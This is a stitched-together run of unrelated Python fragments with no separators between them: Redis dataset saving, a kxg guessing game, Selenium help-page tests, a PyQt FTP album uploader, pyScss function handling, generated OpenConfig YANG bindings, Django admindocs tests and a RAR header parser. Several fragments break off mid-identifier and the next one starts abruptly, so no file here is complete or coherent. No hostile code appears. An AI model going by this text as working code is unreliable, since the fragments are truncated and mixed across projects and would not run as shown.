[saved_game_proto.id]) # Saving memory_buffer.save(sync=True) # Moving file redis_db_path = {True: '/work_dir/redis/saved_redis.rdb', False: os.path.join(WORKING_DIR, 'containers', 'redis', 'saved_redis.rdb')}.get(IN_PRODUCTION) shutil.move(redis_db_path, REDIS_DATASET_PATH) LOGGER.info('... Done creating redis dataset.') # Stopping Redis and thread progress_bar.close() memory_buffer.shutdown() redis_thread.join(timeout=60)
#!/usr/bin/env python3 # vim: tw=76 import kxg import random import pygle
t LOWER_BOUND, UPPER_BOUND = 0, 5000 class World(kxg.World): """ Keep track of the secret number, the range of numbers that haven't been eliminated yet, and the winner (if there is one). """ def __init__(self): super().__init__() self.number = 0 self.lower_bound = 0 self.upper_bound = 0 self.winner = 0 class Referee(kxg.Referee): """ Pick the secret number. ""
" def on_start_game(self, num_players): number = random.randint(LOWER_BOUND + 1, UPPER_BOUND - 1) self >> PickNumber(number, LOWER_BOUND, UPPER_BOUND) class PickNumber(kxg.Message): """ Pick the secret number and communicate that choice to all the clients. """ def __init__(self, number, lower_bound, upper_bound): self.number = number self.lower_bound = lower_bound self.upper_bound = upper_bound def on_check(self, world): if world.number: raise kxg.MessageCheck("number already picked") def on_execute(self, world): world.number = self.number world.lower_bound = self.lower_bound world.upper_bound = self.upper_bound class GuessNumber(kxg.Message): """ Make a guess on behalf of the given player. If the guess is right, that player wins the game. If the guess is wrong, the range of numbers that the secret number could be is narrowed accordingly. """ def __init__(self, player, guess): self.player = player self.guess = guess def on_check(self, world): pass def on_execute(self, world): if self.guess == world.number: world.winner = self.player world.end_game() elif self.guess < world.number: world.lower_bound = max(self.guess, world.lower_bound) elif self.guess > world.number: world.upper_bound = min(self.guess, world.upper_bound) class Gui: """ Manage GUI objects like the window, which exist before and after the game itself. """ def __init__(self): self.width, self.height = 600, 400 self.window = pyglet.window.Window() self.window.set_size(self.width, self.height) self.window.set_visible(True) self.label = pyglet.text.Label( "", color=(255, 255, 255, 255), font_name='Deja Vu Sans', font_size=32, x=self.width//2, y=self.height//2, anchor_x='center', anchor_y='center', ) def on_refresh_gui(self): self.window.clear() self.label.draw() class GuiActor(kxg.Actor): """ Show the players the range of numbers that haven't been eliminated yet, and allow the player to guess what the number is. """ def __init__(self): super().__init__() self.guess = None self.prompt = "{0.lower_bound} < {1} < {0.upper_bound}" def on_setup_gui(self, gui): self.gui = gui self.gui.window.set_handlers(self) def on_draw(self): self.gui.on_refresh_gui() def on_mouse_scroll(self, x, y, dx, dy): # If the user scrolls the mouse wheel, update the guess accordingly. if self.guess is None: if dy < 0: self.guess = self.world.upper_bound else: self.guess = self.world.lower_bound self.guess = sorted([ self.world.lower_bound, self.guess + dy, self.world.upper_bound, ])[1] self.on_update_prompt() def on_key_press(self, symbol, modifiers): # If the user types a number, add that digit to the guess. try: digit = int(chr(symbol)) self.guess = 10 * (self.guess or 0) + digit except ValueError: pass # If the user hits backspace, remove the last digit from the guess. if symbol == pyglet.window.key.BACKSPACE: if self.guess is not None: guess_str = str(self.guess)[:-1] self.guess = int(guess_str) if guess_str else None # If the user hits enter, guess the current number. if symbol == pyglet.window.key.ENTER: if self.guess: self >> GuessNumber(self.id, self.guess) self.guess = None self.on_update_prompt() @kxg.subscribe_to_message(PickNumber) @kxg.subscribe_to_message(GuessNumber) def on_update_prompt(self, message=None): guess_str = '???' if self.guess is None else str(self.guess) self.gui.label.text = self.prompt.format(self.world, guess_str) def on_finish_game(self): self.gui.window.pop_handlers() if self.world.winner == self.id: self.gui.label.text = "You won!" else: self.gui.label.text = "You lost!" class AiActor(kxg.Actor): """ Wait a random amount of time, then guess a random number within the remaining range. """ def __init__(self): super().__init__() self.reset_timer() def on_update_game(self, dt): self.timer -= dt if self.timer < 0: lower_bound = self.world.lower_bound + 1 upper_bound = self.world.upper_bound - 1 guess = random.randint(lower_bound, upper_bound) self >> GuessNumber(self.id, guess) self.reset_timer() def reset_timer(self): self.timer = random.uniform(1, 3) if __name__ == '__main__': kxg.quickstart.main(World, Referee, Gui, GuiActor, AiActor)
from selenium_test_case import SeleniumTestCase class Do
csTest(SeleniumTestCase): def test_links_between_pages(self): self.open_path('/help') self.assert_text_present('Frequently Asked Questions') s
elf.click_and_wait('link=Terms of Service') self.assert_text_present('Terms of Service for Google Resource Finder') self.click_and_wait('link=Privacy') self.assert_text_present('Google Resource Finder Privacy Policy') self.click_and_wait('link=Help') self.assert_text_present('Frequently Asked Questions') def test_languages(self): # English (en) self.open_path('/help?lang=en') self.assert_text_present('Frequently Asked Questions') self.click_and_wait('link=Terms of Service') self.assert_text_present('Terms of Service for Google Resource Finder') self.click_and_wait('link=Privacy') self.assert_text_present('Google Resource Finder Privacy Policy') self.click_and_wait('link=Help') self.assert_text_present('Frequently Asked Questions') # Spanish (es-419) self.open_path('/help?lang=es') self.assert_text_present('Preguntas frecuentes') self.click_and_wait('link=Condiciones del servicio') self.assert_text_present( 'Condiciones del servicio del Buscador de recursos de Google') self.click_and_wait(u'link=Privacidad') self.assert_text_present( u'Pol\u00edtica de privacidad del Buscador de recursos de Google') self.click_and_wait(u'link=Ayuda') self.assert_text_present('Preguntas frecuentes') # French (fr) self.open_path('/help?lang=fr') self.assert_text_present(u'Questions fr\u00e9quentes') self.click_and_wait('link=Conditions d\'utilisation') self.assert_text_present( u'Conditions d\'utilisation de Google Resource Finder') self.click_and_wait(u'link=Confidentialit\u00e9') self.assert_text_present( u'R\u00e8gles de confidentialit\u00e9 de Google Resource Finder') self.click_and_wait(u'link=Aide') self.assert_text_present(u'Questions fr\u00e9quentes') # Kreyol (ht) self.open_path('/help?lang=ht') self.assert_text_present(u'Kesyon Div\u00e8s Moun Poze Tout Tan') self.click_and_wait(u'link=Kondisyon S\u00e8vis yo') self.assert_text_present( u'Kondisyon S\u00e8vis pou Resource Finder Google') self.click_and_wait(u'link=Vi prive') self.assert_text_present(u'Politik Resp\u00e8 Pou Moun ak ' + u'\u201cResource Finder\u201d nan Google') self.click_and_wait(u'link=Ed') self.assert_text_present(u'Kesyon Div\u00e8s Moun Poze Tout Tan')
(fil.read()).hexdigest() #print('Uploaded file %s md5=%s size_local=%s size_remote=%s' % (f, md5, size_local, size_remote)) fil.close() if size_remote != size_local: raise Exception("Sizes don't match!") def getProgress(self): # return current progress percent if self.startlen == 0: return 0.0 return float(self.startlen-len(self.fileslist))/self.startlen def updateButton(self): # update album button style: # progressbar # show activity # percent = float(self.startlen-len(self.fileslist))/self.startlen self.progress_message.emit(self.name, self.getProgress(), self.active) @pyqtSlot() def process(self): #print('START %s', self) #print('fileslist: %s' % self.fileslist) self.prepareFtp() self.i = 0 self.startlen = len(self.fileslist) self.active = True self.updateButton() while True: # get first file name #print("New load cycle by %s" % self) try: f = self.fileslist.pop(0) self.uploadFile(f) #print('sleep', self.i, len(self.fileslist), f) self.message.emit(self.i) self.updateButton() # time.sleep(2.0) # 1/(1-1) except IndexError as err: #print('upload fileslist is empty. \nGot error: %s\n' % err) break except Exception as err: #print('Fatal!!!! \nWhile uploading file "%s" got error: \n%s' % (f, err)) traceback.print_exc(file=sys.stdout) self.fileslist.append(f) time.sleep(2.0) self.prepareFtp() #print('FINISHED') #print('These file(s) were not uploaded: %s' % self.fileslist) self.active=False self.updateButton() self.finished.emit() self.fileslist = [] self.startlen = len(self.fileslist) def enqueueFiles(self, fileslist): if self.fileslist is None: self.fileslist = [] self.startlen = 0 for f in filesl
ist: if os.path.isdir(f):
subdirfiles = [os.path.join(f, i) for i in os.listdir(f)] self.enqueueFiles(subdirfiles) else: self.fileslist.append(f) self.startlen += 1 # self.fileslist.extend(fileslist) # self.startlen += len(fileslist) class AlbumButton(QPushButton): """docstring for AlbumButton""" drop_ready = pyqtSignal(bool) def __init__(self, name, ftp_login, ftp_passwd): # super(AlbumButton, self).__init__() QPushButton.__init__(self, name) self.name = name self.ftp_login = ftp_login self.ftp_passwd = ftp_passwd # self.active = False self.setStyleSheet(self.formatStyle()) self.setAcceptDrops(True) self.drop_ready.connect(self.setDropReady) # self.setToolTip('Левая кнопка - загрузить файлы\nПравая - дополнительные действия') def contextMenuEvent(self, event): menu = QMenu(self) menu.addAction('Добавить файлы к альбому', self.selectFiles) menu.show() menu.exec_(QCursor.pos()) def mousePressEvent(self, event): if event.type() in (QEvent.MouseButtonPress,) and event.button() == Qt.LeftButton: self.selectFiles() else: super().mousePressEvent(event) def setDropReady(self, ready): # print (self.name, ready) self.setProperty('dropReady', ready) self.style().unpolish(self) self.style().polish(self) # self.update() self.repaint() def dragLeaveEvent(self, event): self.drop_ready.emit(False) super().dragLeaveEvent(event) event.accept() def dragEnterEvent(self, event): self.drop_ready.emit(True) super().dragEnterEvent(event) event.accept() def dropEvent(self, event): urls = event.mimeData().urls() print (urls) self.drop_ready.emit(False) self.enqueueFilesToUpload([u.toLocalFile() for u in urls]) event.accept() def selectFiles(self): # show dialog, get list of files/dir, start uploader dialog = QFileDialog() dialog.setFileMode(QFileDialog.AnyFile) qfileslist = dialog.getOpenFileNames(self, u'Загрузка в альбом "%s"' % self.name)[0] fileslist = [str(x) for x in qfileslist] if fileslist: self.enqueueFilesToUpload(fileslist) def enqueueFilesToUpload(self, fileslist): # add fileslist (str[]) to # enqueue files to specific folder uploader album_name = self.name uploader = album_uploaders.get(album_name) if uploader is None: # start new uploader uploader = AlbumUploader() uploader.setName(album_name, self.ftp_login, self.ftp_passwd) thread = QThread(self) uploader.moveToThread(thread) thread.started.connect(uploader.process) uploader.finished.connect(thread.quit) # uploader.finished.connect(lambda: print('==FINISHED')) uploader.finished.connect(uploader.deleteLater) thread.finished.connect(thread.deleteLater) uploader.finished.connect(lambda: self.cleanAlbumUploaders(album_name)) uploader.progress_message.connect(self.updateProgressBar) # uploader.message.connect(self.text) thread.start() album_uploaders[album_name] = uploader uploader.enqueueFiles(fileslist) ### ??? #print('AlbumUploaders after enqueue: ', album_uploaders) def cleanAlbumUploaders(self, album_name): del album_uploaders[album_name] #print('AlbumUploaders after clean: ', album_uploaders) def formatStyle(self, percent=0.0, active=False): # format style depending on progress level low = percent-0.001 if low < 0.0 : low = 0 high = percent+0.001 if high >= 1.0 : high = 0.9999 color = "#d8d8d8" if active: color = "#ffffd8" # self.setText(self.name + ' (Загружено ' + ('%0.f' % (percent*100)) + '%)' ) # + ' %02.f' % 100*percent) style = """QPushButton {font-size: 16pt; /* background-color: #d8d8d8; */ padding: 0.5em; margin: 0.3em; background: qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0, stop: 0 green, stop: %(low)s green, stop: %(high)s %(color)s, stop: 1.0 %(color)s)} QPushButton[dropReady="true"]:hover { background-color: #d8f0d8; font-weight: bold; } QPushButton:hover {background-color: #d8f0d8; /* border: solid 1px green */} """ % dict(low=low, high=high, color=color) return style def updateProgressBar(self, name, percent, active=False): #print ('Updating updateProgressBar to', percent) style = self.formatStyle(percent, active) self.setStyleSheet(style) if active: # color = "#ffffd8" self.setText(self.name + ' (Загружено ' + ('%0.f' % (percent*100)) + '%)' ) # + ' %02.f' % 100*percent) # print (style) def start_ftp(login, passwd): # starts ftp connection ftp = ftplib.FTP(settings.host, login, passwd, None, 180) ftp.encoding = 'utf-8' ftp.set_debuglevel(level=0) ftp.set_pasv(True) return ftp def get_qsettings(): '''returns QSettings with set Company and Product names''' return QSettings(settings.company, settings.product) def save_settings(login, passwd, remember): qset = get_qsettings() qset.setValue('login', login) qset.setValue('passwd', passwd) qset.setValue('remember', remember) def restore_settings(settings): qset = get_qsettings() settings.login = qset.value('login', type=str) settings.passwd = qset.value('passwd', type=str) settings.remember = qset.value('remember', type=bool
0}".format(value)) elif key in ('warn_unused', 'control_scoping'): # TODO deprecate control_scoping? or add it to compiler? if not isinstance(value, bool): raise SassError("The '{0}' @option requires a bool, not {1!r}".format(key, value)) else: raise SassError("Unknown @option: {0}".format(key)) rule.legacy_compiler_options[key] = value def _get_funct_def(self, rule, calculator, argument): funct, lpar, argstr = argument.partition('(') funct = calculator.do_glob_math(funct) funct = normalize_var(funct.strip()) argstr = argstr.strip() # Parse arguments with the argspec rule if lpar: if not argstr.endswith(')'): raise SyntaxError("Expected ')', found end of line for %s (%s)" % (funct, rule.file_and_line)) argstr = argstr[:-1].strip() else: # Whoops, no parens at all. That's like calling with no arguments. argstr = '' argspec_node = calculator.parse_expression(argstr, target='goal_argspec') return funct, argspec_node def _populate_namespace_from_call(self, name, callee_namespace, mixin, args, kwargs): # Mutation protection args = list(args) kwargs = OrderedDict(kwargs) #m_params = mixin[0] #m_defaults = mixin[1] #m_codestr = mixin[2] pristine_callee_namespace = mixin[3] callee_argspec = mixin[4] import_key = mixin[5] callee_calculator = self._make_calculator(callee_namespace) # Populate the mixin/function's namespace with its arguments for var_name, node in callee_argspec.iter_def_argspec(): if args: # If there are positional arguments left, use the first value = args.pop(0) elif var_name in kwargs: # Try keyword arguments value = kwargs.pop(var_name) elif node is not None: # OK, try the default argument. Using callee_calculator means # that default values of arguments can refer to earlier # arguments' values; yes, that is how Sass works. value = node.evaluate(callee_calculator, divide=True) else: # TODO this should raise value = Undefined() callee_namespace.set_variable(var_name, value, local_only=True) if callee_argspec.slurp: # Slurpy var gets whatever is left # TODO should preserve the order of extra kwargs sass_kwargs = [] for key, value in kwargs.items(): sass_kwargs.append((String(key[1:]), value)) callee_namespace.set_variable( callee_argspec.slurp.name, Arglist(args, sass_kwargs)) args = [] kwargs = {} elif callee_argspec.inject: # Callee namespace gets all the extra kwargs whether declared or # not for var_name, value in kwargs.items(): callee_namespace.set_variable(var_name, value, local_only=True) kwargs = {} # TODO would be nice to say where the mixin/function came from if kwargs: raise NameError("%s has no such argument %s" % (name, kwargs.keys()[0])) if args: raise NameError("%s received extra arguments: %r" % (name, args)) pristine_callee_namespace.use_import(import_key) return callee_namespace # @print_timing(10) def _at_function(self, calculator, rule, scope, block): """ Implements @mixin and @function """ if not block.argument: raise SyntaxError("%s requires a function name (%s)" % (block.directive, rule.file_and_line)) funct, argspec_node = self._get_funct_def(rule, calculator, block.argument) defaults = {} new_params = [] for var_name, default in argspec_node.iter_def_argspec(): new_params.append(var_name) if default is not None: defaults[var_name] = default # TODO a function or mixin is re-parsed every time it's called; there's # no AST for anything but expressions :( mixin = [rule.source_file, block.lineno, block.unparsed_contents, rule.namespace, argspec_node, rule.source_file] if block.directive == '@function': def _call(mixin): def __call(namespace, *args, **kwargs): source_file = mixin[0] lineno = mixin[1] m_codestr = mixin[2] pristine_callee_namespace = mixin[3] callee_namespace = pristine_callee_namespace.derive() # TODO CallOp converts Sass names to Python names, so we # have to convert them back to Sass names. would be nice # to avoid this back-and-forth somehow kwargs = OrderedDict( (normalize_var('$' + key), value) for (key, value) in kwargs.items()) self._populate_namespace_from_call( "Function {0}".format(funct), callee_namespace, mixin, args, kwargs) _rule = SassRule( source_file=source_file, lineno=lineno, unparsed_contents=m_codestr, namespace=callee_namespace, # rule import_key=rule.import_key, legacy_compiler_options=rule.legacy_compiler_options, options=rule.options, properties=rule.properties, extends_selectors=rule.extends_selectors, ancestry=rule.ancestry, nested=rule.nested, ) # TODO supposed to throw an error if there's a slurpy arg
# but keywords() is never called on it try: self.manage_children(_rule, scope) except SassReturn as e: return e.retval else: return Null() return __call _mixin = _call(mixin) _mixin.mixin = mixin
mixin = _mixin if block.directive == '@mixin': add = rule.namespace.set_mixin elif block.directive == '@function': add = rule.namespace.set_function # Register the mixin for every possible arity it takes if argspec_node.slurp or argspec_node.inject: add(funct, None, mixin) else: while len(new_params): add(funct, len(new_params), mixin) param = new_params.pop() if param not in defaults: break if not new_params: add(funct, 0, mixin) _at_mixin = _at_function # @print_timing(10) def _at_include(self, calculator, rule, scope, block): """ Implements @include, for @mixins """ caller_namespace = rule.namespace caller_calculator = self._make_calculator(caller_namespace) funct, caller_argspec = self._get_funct_def(rule, caller_calculator, block.argument) # Render the passed arguments, using the caller's namespace args, kwargs = caller_argspec.evaluate_call_args(caller_calculator) argc = len(args) + len(kwargs) try: mixin = caller_namespace.mixin(funct, argc) except KeyError: try: # TODO maybe? don't do this, once '...' works # Fallback to single parameter: mixin = caller_namespace.mixin(funct, 1) except KeyError: log.error("Mixin not found: %s:%d (%s)", funct, argc, rule.file_and_line, extra={'stack': True}) retur
ssType( base_type=long, restriction_dict={"range": ["0..4294967295"]}, int_size=32, ), is_leaf=True, yang_name="value", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint32", is_config=False, ) self.__flags = YANGDynClass( base=TypedListType( allowed_type=RestrictedClassType( base_type=six.text_type, restriction_type="dict_key", restriction_arg={ "ADDRESS_FAMILY": {}, "BACKUP": {}, "VALUE": {}, "LOCAL": {}, "SET": {}, }, ) ), is_leaf=False, yang_name="flags", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="enumeration", is_config=False, ) self.__weight = YANGDynClass( base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8 ), is_leaf=True, yang_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint8", is_config=False, ) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path() + [self._yang_name] else: return [ "network-instances", "network-instance", "protocols", "protocol", "isis", "levels", "level", "link-state-database", "lsp", "tlvs", "tlv", "mt-isn", "neighbors", "neighbor", "subTLVs", "subTLVs", "adjacency-sid", "sid", "state", ] def _get_value(self): """ Getter method for value, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/value (uint32) YANG Description: Adjacency-SID value. """ return self.__value def _set_value(self, v, load=False): """ Setter method for value, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/value (uint32) If this variable is read-only (config: false) in the source YANG file, then _set_value is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_value() directly. YANG Description: Adjacency-SID value. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=RestrictedClassType( base_type=long, restriction_dict={"range": ["0..4294967295"]}, int_size=32, ), is_leaf=True, yang_name="value", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="ht
tp://openco
nfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint32", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """value must be of a type compatible with uint32""", "defined-type": "uint32", "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="value", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""", } ) self.__value = t if hasattr(self, "_set"): self._set() def _unset_value(self): self.__value = YANGDynClass( base=RestrictedClassType( base_type=long, restriction_dict={"range": ["0..4294967295"]}, int_size=32, ), is_leaf=True, yang_name="value", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint32", is_config=False, ) def _get_flags(self): """ Getter method for flags, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/flags (enumeration) YANG Description: Flags associated with Adj-Segment-ID. """ return self.__flags def _set_flags(self, v, load=False): """ Setter method for flags, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/flags (enumeration) If this variable is read-only (config: false) in the source YANG file, then _set_flags is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_flags() directly. YANG Description: Flags associated with Adj-Segment-ID. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=TypedListType( allowed_type=RestrictedClassType( base_type=six.text_type, restriction_type="dict_key", restriction_arg={ "ADDRESS_FAMILY": {}, "BACKUP": {}, "VALUE": {},
ngo administration</a></h1>') self.client.logout() response = self.client.get(reverse('django-admindocs-docroot'), follow=True) # Should display the login screen self.assertContains(response, '<input type="hidden" name="next" value="/admindocs/" />', html=True) def test_bookmarklets(self): response = self.client.get(reverse('django-admindocs-bookmarklets')) self.assertContains(response, '/admindocs/views/') def test_templatetag_index(self): response = self.client.get(reverse('django-admindocs-tags')) self.assertContains(response, '<h3 id="built_in-extends">extends</h3>', html=True) def test_templatefilter_index(self): response = self.client.get(reverse('django-admindocs-filters')) self.assertContains(response, '<h3 id="built_in-first">first</h3>', html=True) def test_view_index(self): response = self.client.get(reverse('django-admindocs-views-index')) self.assertContains( response, '<h3><a href="/admindocs/views/django.contrib.admindocs.views.BaseAdminDocsView/">/admindocs/</a></h3>', html=True ) self.assertContains(response, 'Views by namespace test') self.assertContains(response, 'Name: <code>test:func</code>.') def test_view_index_with_method(self): """ Views that are methods are listed correctly. """ response = self.client.get(reverse('django-admindocs-views-index')) self.assertContains( response, '<h3><a href="/admindocs/views/django.contrib.admin.sites.AdminSite.index/">/admin/</a></h3>', html=True ) def test_view_detail(self): url = reverse('django-admindocs-views-detail', args=['django.contrib.admindocs.views.BaseAdminDocsView']) response = self.client.get(url) # View docstring self.assertContains(response, 'Base view for admindocs views.') @override_settings(ROOT_URLCONF='admin_docs.namespace_urls') def test_namespaced_view_detail(self): url = reverse('django-admindocs-views-detail', args=['admin_docs.views.XViewClass']) response = self.client.get(url) self.assertContains(response, '<h1>admin_docs.views.XViewClass</h1>') def test_view_detail_illegal_import(self): url = reverse('django-admindocs-views-detail', args=['urlpatterns_reverse.nonimported_module.view']) response = self.client.get(url) self.assertEqual(response.status_code, 404) self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules) def test_view_detail_as_method(self): """ Views that are methods can be displayed. """ url = reverse('django-admindocs-views-detail', args=['django.contrib.admin.sites.AdminSite.index']) response = self.client.get(url) self.assertEqual(response.status_code, 200) def test_model_index(self): response = self.client.get(reverse('django-admindocs-models-index')) self.assertContains( response, '<h2 id="app-auth">Authentication and Authorization (django.contrib.auth)</h2>', html=True ) def test_template_detail(self): response = self.client.get(reverse('django-admindocs-templates', args=['admin_doc/template_detail.html'])) self.assertContains(response, '<h1>Template: "admin_doc/template_detail.html"</h1>', html=True) def test_missing_docutils(self): utils.docutils_is_available = False try: response = self.client.get(reverse('django-admindocs-docroot')) self.assertContains( response, '<h3>The admin documentation system requires Python\'s ' '<a href="http://docutils.sf.net/">docutils</a> library.</h3>', html=True ) self.assertContains(response, '<h1 id="site-name"><a href="/admin/">Django administration</a></h1>') finally: utils.docutils_is_available = True @modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'}) @override_settings(SITE_ID=None) # will restore SITE_ID after the test def test_no_sites_framework(self): """ Without the sites framework, should not access SITE_ID or Site ob
jects. Deleting settings is fine here as UserSettingsHolder is used. """ Site.objects.all().delete() del settings.S
ITE_ID response = self.client.get(reverse('django-admindocs-views-index')) self.assertContains(response, 'View documentation') @override_settings(TEMPLATES=[{ 'NAME': 'ONE', 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'APP_DIRS': True, }, { 'NAME': 'TWO', 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'APP_DIRS': True, }]) @unittest.skipUnless(utils.docutils_is_available, "no docutils installed.") class AdminDocViewWithMultipleEngines(AdminDocViewTests): def test_templatefilter_index(self): # Overridden because non-trivial TEMPLATES settings aren't supported # but the page shouldn't crash (#24125). response = self.client.get(reverse('django-admindocs-filters')) self.assertContains(response, '<title>Template filters</title>', html=True) def test_templatetag_index(self): # Overridden because non-trivial TEMPLATES settings aren't supported # but the page shouldn't crash (#24125). response = self.client.get(reverse('django-admindocs-tags')) self.assertContains(response, '<title>Template tags</title>', html=True) @unittest.skipUnless(utils.docutils_is_available, "no docutils installed.") class TestModelDetailView(TestDataMixin, AdminDocsTestCase): def setUp(self): self.client.force_login(self.superuser) with captured_stderr() as self.docutils_stderr: self.response = self.client.get(reverse('django-admindocs-models-detail', args=['admin_docs', 'Person'])) def test_method_excludes(self): """ Methods that begin with strings defined in ``django.contrib.admindocs.views.MODEL_METHODS_EXCLUDE`` shouldn't be displayed in the admin docs. """ self.assertContains(self.response, "<td>get_full_name</td>") self.assertNotContains(self.response, "<td>_get_full_name</td>") self.assertNotContains(self.response, "<td>add_image</td>") self.assertNotContains(self.response, "<td>delete_image</td>") self.assertNotContains(self.response, "<td>set_status</td>") self.assertNotContains(self.response, "<td>save_changes</td>") def test_methods_with_arguments(self): """ Methods that take arguments should also displayed. """ self.assertContains(self.response, "<h3>Methods with arguments</h3>") self.assertContains(self.response, "<td>rename_company</td>") self.assertContains(self.response, "<td>dummy_function</td>") self.assertContains(self.response, "<td>suffix_company_name</td>") def test_methods_with_arguments_display_arguments(self): """ Methods with arguments should have their arguments displayed. """ self.assertContains(self.response, "<td>new_name</td>") def test_methods_with_arguments_display_arguments_default_value(self): """ Methods with keyword arguments should have their arguments displayed. """ self.assertContains(self.response, "<td>suffix=&#39;ltd&#39;</td>") def test_methods_with_multiple_arguments_display_arguments(self): """ Methods with multiple arguments should have all their arguments displayed, but omitting 'self'. """ self.assertContains(self.response, "<td>baz, rox, *some_args, **some_kwargs</td>") def test_method_data_types(self): company = Company.objects.create(name="Django") person = Person.objects.create(first_name="Human", last_name="User", company=company) self.assertEqual(get_return_data_type(person.get_status_count.__name__), 'Integ
_method", "Comment packing method") yield UInt16(s, "comment_crc16", "Comment CRC") def commentBody(s): size = s["total_size"].value - s.current_size if size > 0: yield RawBytes(s, "comment_data", size, "Compressed comment data") def signatureHeader(s): yield TimeDateMSDOS32(s, "creation_time") yield filesizeHandler(UInt16(s, "arc_name_size")) yield filesizeHandler(UInt16(s, "user_name_size")) def recoveryHeader(s): yield filesizeHandler(UInt32(s, "total_size")) yield textHandler(UInt8(s, "version"), hexadecimal) yield UInt16(s, "rec_sectors") yield UInt32(s, "total_blocks") yield RawBytes(s, "mark", 8) def avInfoHeader(s): yield filesizeHandler(UInt16(s, "total_size", "Total block size")) yield UInt8(s, "version", "Version needed to decompress", handler=hexadecimal) yield UInt8(s, "method", "Compression method", handler=hexadecimal) yield UInt8(s, "av_version", "Version for AV", handler=hexadecimal) yield UInt32(s, "av_crc", "AV info CRC32", handler=hexadecimal) def avInfoBody(s): size = s["total_size"].value - s.current_size if size > 0: yield RawBytes(s, "av_info_data", size, "AV info") class FileFlags(FieldSet): static_size = 16 def createFields(self): yield Bit(self, "continued_from", "File continued from previous volume") yield Bit(self, "continued_in", "File continued in next volume") yield Bit(self, "is_encrypted", "File encrypted with password") yield Bit(self, "has_comment", "File comment present") yield Bit(self, "is_solid", "Information from previous files is used (solid flag)") # The 3 following lines are what blocks more staticity yield Enum(Bits(self, "dictionary_size", 3, "Dictionary size"), DICTIONARY_SIZE) yield Bit(self, "is_large", "file64 operations needed") yield Bit(self, "is_unicode", "Filename also encoded using Unicode") yield Bit(s
elf, "has_salt", "Has salt for encryption") yield Bit(self, "uses_file_version", "File versio
ning is used") yield Bit(self, "has_ext_time", "Extra time info present") yield Bit(self, "has_ext_flags", "Extra flag ??") for field in commonFlags: yield field[0](self, *field[1:]) def fileFlags(s): yield FileFlags(s, "flags", "File block flags") class ExtTimeFlags(FieldSet): static_size = 16 def createFields(self): for name in ['arctime', 'atime', 'ctime', 'mtime']: yield Bits(self, "%s_count" % name, 2, "Number of %s bytes" % name) yield Bit(self, "%s_onesec" % name, "Add one second to the timestamp?") yield Bit(self, "%s_present" % name, "Is %s extra time present?" % name) class ExtTime(FieldSet): def createFields(self): yield ExtTimeFlags(self, "time_flags") for name in ['mtime', 'ctime', 'atime', 'arctime']: if self['time_flags/%s_present' % name].value: if name != 'mtime': yield TimeDateMSDOS32(self, "%s" % name, "%s DOS timestamp" % name) count = self['time_flags/%s_count' % name].value if count: yield Bits(self, "%s_remainder" % name, 8 * count, "%s extra precision time (in 100ns increments)" % name) def createDescription(self): out = 'Time extension' pieces = [] for name in ['mtime', 'ctime', 'atime', 'arctime']: if not self['time_flags/%s_present' % name].value: continue if name == 'mtime': basetime = self['../ftime'].value else: basetime = self['%s' % name].value delta = timedelta() if self['time_flags/%s_onesec' % name].value: delta += timedelta(seconds=1) if '%s_remainder'%name in self: delta += timedelta(microseconds=self['%s_remainder' % name].value / 10.0) pieces.append('%s=%s' % (name, basetime + delta)) if pieces: out += ': ' + ', '.join(pieces) return out def specialHeader(s, is_file): yield filesizeHandler(UInt32(s, "compressed_size", "Compressed size (bytes)")) yield filesizeHandler(UInt32(s, "uncompressed_size", "Uncompressed size (bytes)")) yield Enum(UInt8(s, "host_os", "Operating system used for archiving"), OS_NAME) yield textHandler(UInt32(s, "crc32", "File CRC32"), hexadecimal) yield TimeDateMSDOS32(s, "ftime", "Date and time (MS DOS format)") yield 